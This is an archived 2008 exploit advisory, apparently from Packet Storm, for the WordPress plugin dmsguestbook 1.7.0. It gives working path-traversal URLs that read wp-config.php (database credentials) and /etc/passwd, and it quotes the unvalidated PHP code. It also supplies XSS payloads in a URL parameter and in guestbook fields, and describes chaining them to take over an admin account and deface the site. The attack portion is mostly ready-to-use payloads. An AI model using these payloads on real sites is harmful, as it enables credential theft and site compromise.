what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

wpdmsguest-multi.txt

wpdmsguest-multi.txt
Posted Feb 3, 2008
Authored by NBBN

The Wordpress plugin dmsguestbook version 1.7.0 suffers from local file disclosure and cross site scripting vulnerabilities.

tags | exploit, local, vulnerability, xss
SHA-256 | a2c64ca8a4970194cdf9d43bebae2d86eb4f7014e741dd6437e55729b6ce0c7d

wpdmsguest-multi.txt

Change Mirror Download
########################################################
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities
by NBBN 2nd, February 2008
########################################################

1) File Disclosure

Open the following url you can see the config data of wordpress, with the
mysql-server username and password. In this file you usually have write
permission, so an attacker can place his deface page here:

http://site.tld/wordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=../../../../wp-config.php

Vuln code:
Line: 652-655
$handle = fopen ($abspath . "wp-content/plugins/dmsguestbook/" .
$_REQUEST[folder] . $_REQUEST[file], "r");
if(is_writable($abspath . "wp-content/plugins/dmsguestbook/" .
$_REQUEST[folder] . $_REQUEST[file])) {
echo "<br />$_REQUEST[file] <font style='color:#00bb00;'>is
writable!</font><br />Set $file readonly again when your finished to
customize!";


$_REQUEST[folder] & $_REQUEST[file] doesn't checked.



Another PoC:
http://localhost/xampp/wordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=../../../../../../../../../../../../../../../../etc/passwd

Ok, for this you need an admin account, but you can get an admin account with
the follow xss vulnerabilities.

################


2) Cross-Site Scripting Vulnerabilities

a) If the script doesn't find the file, php shows an errormessage, so for xss
open this:


http://site.tldwordpress/wp-admin/admin.php?page=dmsguestbook&advanced=1&folder=language/&file=<script>alert("XSS")</script>

b) Another vulnerability:

Find the guestbook page. In the messagefield write </textarea>[your xss code].
So, if admin go to the admin panel, to show himself the guestbook, he execute
your xss code

c) Again in the guestbook

Enter your message in the title ">[xss] and in the messagearea:
</textarea>[xss] and enter a wrong captcha-code, you execute the xss code




Note: There more some more XSS-Vuln's.


################

3) SQL-Injection Vulnerabilities

There are some SQL-Injection vulnerabilites, but an attacker need an admin
account and if he is in the administration-panel, a sql-injection he not
need.



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close